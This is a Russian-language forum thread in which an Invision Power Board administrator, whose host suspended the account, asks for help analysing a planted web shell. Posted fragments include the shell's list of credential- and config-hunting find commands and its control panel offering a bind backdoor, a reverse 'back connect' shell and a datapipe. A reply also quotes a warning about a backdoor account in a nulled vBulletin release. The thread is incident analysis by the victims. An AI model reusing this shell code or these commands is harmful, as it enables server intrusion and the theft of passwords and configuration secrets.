Перейти к контенту
  • 0

Хостер суспендил аккаунт!!!


Panove

Вопрос

Ахтунг!

Хостер суспендил аккаунт!!!

Версия 2.1.6

в домашних папках находились php шеллы, скрипты для

попытки взлома сервера, боты.

 

скрипт:

forum/sources/classes/post/class_reply.php

Если у кого есть оригинальный class_reply.php поделитесь - необходим для анализа внесенных изменений и восстановления исходного кода!!

Интересующимся: кусок кода:

@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
error_reporting(E_ALL & ~E_NOTICE);
$create_password = true;
$pes = "sql"; 

$fast_commands = "
Show open ports (nst) netstat -an | grep LISTEN | grep tcp
last root (nst) last root
last (all users) (nst) last all
Find all config.php in / (nst) find / -type f -name config.php
Find all config.php in . (nst) find . -type f -name config.php
Find all admin.php in / (nst) find / -type f -name admin.php
Find all admin.php in . (nst) find . -type f -name admin.php
Find all config.inc.php in / (nst) find / -type f -name config.inc.php
Find all config.inc.php in . (nst) find . -type f -name config.inc.php
Find all config.inc in / (nst) find / -type f -name config.inc
Find all config.inc in . (nst) find . -type f -name config.inc
Find all config.dat in / (nst) find / -type f -name config.dat
Find all config.dat in . (nst) find . -type f -name config.dat
Find all config* in / (nst) find / -type f -name config*
Find all config* in . (nst) find . -type f -name config*
Find all pass* in / (nst) find / -type f -name pass*
Find all pass* in . (nst) find . -type f -name pass*
Find all .bash_history in / (nst) find / -type f -name .bash_history
Find all .bash_history in . (nst) find . -type f -name .bash_history
Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
Find all writable dirs/files in / (nst) find / -perm -2 -ls
Find all writable dirs/files in . (nst) find . -perm -2 -ls
Find all suid files in / (nst) find / -type f -perm -04000 -ls
Find all suid files in . (nst) find . -type f -perm -04000 -ls
Find all sgid files in / (nst) find / -type f -perm -02000 -ls
Find all sgid files in . (nst) find . -type f -perm -02000 -ls
Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
OS Version? (nst) sysctl -a | grep version
Kernel version? (nst) cat /proc/version
cat syslog.conf (nst) cat /etc/syslog.conf
Cat - Message of the day (nst) cat /etc/motd
Cat hosts (nst) cat /etc/hosts
Distrib name (nst) cat /etc/issue.net
Distrib name (2) (nst) cat /etc/*-realise
Display all process - wide output (nst) ps auxw
Display all your process (nst) ps ux
Interfaces (nst) ifconfig
CPU? (nst) cat /proc/cpuinfo
RAM (nst) free -m
HDD space (nst) df -h
List of Attributes (nst) lsattr -a
Mount options (nst) cat /etc/fstab
Is cURL installed? (nst) which curl
Is wGET installed? (nst) which wget
Is lynx installed? (nst) which lynx
Is links installed? (nst) which links
Is fetch installed? (nst) which fetch
Is GET installed? (nst) which GET
Is perl installed? (nst) which perl
Where is apache (nst) whereis apache
Where is perl (nst) whereis perl
locate proftpd.conf (nst) locate proftpd.conf
locate httpd.conf (nst) locate httpd.conf
locate my.conf (nst) locate my.conf
locate psybnc.conf (nst) locate psybnc.conf
";



# WINDOWS COMMANDS
# description (nst) command
# example: Delete autoexec.bat (nst) del c:\autoexec.bat
$fast_commands_win = "
OS Version (nst) ver
Tasklist  (nst) tasklist
Attributes in . (nst) attrib
Show open ports (nst) netstat -an
";

И так далее...

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0
IPB является платным ПО,посему не рекомендую его распространять

Вопрос не в распростанении, а В решении проблемы! Где гарантия, что завтра Вы не станете в аналогичном положении?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

SomehaiN, зайди в просмотр своего профиля, просмотри все свои сообщения: от тебя столько флейма!

Так и обживай форум "Флейм", не мешай людям разбираться с проблемами!

Извиняюсь за оффтоп, но нужна конкретная помощь, а не советы, что надо было делать! Все что надо было - сделано!!! -> был бы результат - не было бы этой темы!

Ссылка на комментарий
Поделиться на других сайтах

  • 0

что в этом плохого, что я люблю поговорить в подфоруме "Флейм"?.

 

 

По теме: в файле class_post_reply.php не хватает нескольких разделительных знаков. Вышли мне в ПМ свой class_post_reply.php

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Небольшой анализ показал, что содержимое файла является скриптом, позволяющим получить врагу шелл и прочую лабуду на сервере хостера, чему хостер будет несказанно рад!

Один фрагмент кода уже говорит сам за себя:

<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>

 

Кстати, кто нарыл в своих файлах аналогичный код, проверьте тут: www.void.ru - может вы уже в коллекции задефейсенных...

 

PS: я по прежнему не откажусь от оригинального файла class_reply.php

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Нет такого файла в дистрибъютиве и не было никогда...

 

 

 

Вот кстати объявление с вобловского форума:

!!! Внимание всем кто качал !!!

 

Релиз:

VBulletin.v3.6.0.Gold.PHP.NULL.Incl.Keygen.GOODBYE .FOREVER.READ.NFO-SCRiPTMAFiA.rar

подвержен взлому, т.к. в архиве содержится файл "черного входа".

 

Советую всем проверить базу на пользователя:

Логин: vb

Пасс: qwerty

 

А так же надо удалить файл:

./includes/class_thumb.php

 

Шелл находится в релизе практически с первого дня его появления в паблике.

 

 

G0gA, а вы проверяйте, че за файл у вас там...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Нет такого файла в дистрибъютиве и не было никогда...

 

 

 

Вот кстати объявление с вобловского форума:

!!! Внимание всем кто качал !!!

 

......

 

 

G0gA, а вы проверяйте, че за файл у вас там...

 

Я подозревал, что его не было - но мне приходят в личку сообщения, что в версии 2.1.4 есть такой файл!

В дистрибутиве версии 2.1.4. , которым я располагаю, также нет такого файла, но люди присылают вполне нормальные файлы, а это уже интересно!

Кстати, те файлы, которые прислали люди не содержат ровным счетом ничего подозрительного!

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.